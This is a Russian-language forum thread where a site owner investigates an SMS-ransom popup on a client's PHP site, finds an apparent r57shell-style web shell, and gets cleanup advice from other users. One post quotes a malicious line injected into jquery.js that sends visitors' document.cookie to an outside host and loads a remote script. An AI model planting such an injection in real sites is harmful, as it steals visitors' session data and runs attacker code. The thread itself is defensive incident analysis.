Вирус на PHP

Jon

Новичок
Недавно у клиента стала появляться заставка на сайте, о вводе СМС, для продолжения работы сайта. Я не как не мог поймать такое сообщение, покопавшись в логах действительно нашел, ссылается на адрес (что то такое, но ID другое) intitle.ocry.com/ptd1/sec.php?id=112313123 (там вируса нет)

Начал копать от куда ноги растут, так пока и не нашел, периодически появляется данное сообщение. Но в корне нашел чужой файл, я так понимаю это php sheel клиент что ли. Файл прилагаю в txt формате, осторожнее!

Вычитал только, что советуют отключить функции
PHP:
exec,ini_get,ini_get_all,parse_ini_file,passthru,php_uname,popen,proc_open,shell_exec,show_source,system
1. Как не имея доступа к php.ini их можно отключить не подскажите?(
2. Кто нибудь сталкивался с таким?

p.s. если ктото хочет посмотреть как работает файл, пароль в простом md5, сейчас demo поставил.

Вложения

• 18,1 KB Просмотры: 6

fixxxer

К.О.
Партнер клуба
Блин... Да, скорее всего ты прав. Забыл я уже давно, что бывают фтп и пароли... :)

Jon

Новичок
Перерыл сейчас все файлы, на сервере нету не чего. Даже даты изменения не тронуты. Но в логах вижу обращения с главной страницы или с другой страницы прямо на этот скрипт.

Пример
PHP:
109.167.205.2 - - [13/Aug/2012:23:52:49 +0400] "GET / HTTP/1.0" 200 15893 "http://intitle.ocry.com/ptd1/sec.php?id=28673699565410&mode=security&f=www.phpclub.ru%2F&row=full" "Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1"

Вурдалак

Продвинутый новичок
На даты изменения файлов можно не обращать внимания, потому что они легко подделываются с помощью touch.

Jon

Новичок
Мастерхост еще логи только по запросу дает, или на след. день. офигенный хостер)

Jon

Новичок
И чисто ради интереса, на хостинге, если я захожу через SSH, я могу нарыть php.ini или доступ закрыт должен быть?

WMix

герр M:)ller
Партнер клуба
часто бывает наоборот, ломают сервер, а дальше во всем виртуальным хостам разбрасывают файлики... в смысле твоя программа может быть нипричем...
2 раза уже было такое, а так как на одном хостере было несколько проджектов, приходилось чистить все

Jon

Новичок
Нашел в jquery.js строку чужую.

PHP:
var lnk='http://statistics.ns01.us/go.php?i=20&m=js&d='+ window.location.hostname+'&u='+encodeURIComponent(window.location.pathname)+ '&r='+encodeURIComponent(document.referrer.replace('http://',''))+'&c='+encodeURIComponent(document.cookie); var js=document.createElement('script'); js.type='text/javascript'; js.src=lnk; document.getElementsByTagName('head')[0].appendChild(js);
Соответственно в head добавляет что то вроде
PHP:
http://statistics.ns01.us/go.php?i=20&m=js&d=fiddle.jshell.net&u=%2F_display%2F&r=jsfiddle.net%2F&c=__utmx%3D1
И получаем создание куки
PHP:
function setCookie(name, value, expires, path, domain, secure) { var date=new Date(expires*1000); document.cookie = name + "=" + escape(value) + ((expires) ? "; expires=" + date.toGMTString() : "") + ((path) ? "; path=" + path : "") + ((domain) ? "; domain=" + domain : "") + ((secure) ? "; secure" : ""); }	 setCookie('__utmx','1',1346753389,'/','.fiddle.jshell.net');
Назвали __utmx типа это Google Analytics

Но как сообщение всплывает не пойму. Вызов куки не нашел на сайте.

baev

‹°°¬•
Команда форума
Нанять специалиста.

(Блин, действия элементарные:
— проверить свой компьютер на вирусы/трояны;
— убедиться, что используется нескомпрометированный ftp-клиент;
— поменять все пароли доступа;
— сравнить бэкапы за разные даты и выявить, наконец, изменения.)

DYPA

Настоящая dypa (c)
Так что, есть идеи что делать?
менять пароли от панели, заблокировать все ftp и ssh которые используются сейчас (либо сменить пароли)
выставить грамотно права на файлы, небось сейчас 0777 на всё ;)
смотреть все исходники последовательно, смотреть логи ftp если есть, смотреть логи вебсервера если есть.
что за движок, последняя ли версия, есть ли паблик уязвимости под него?

lib.txt сильно напоминает старый r57shell

Но как сообщение всплывает не пойму.
проверить исходники на все вызовы base64_decode, eval, echo, print

Сверху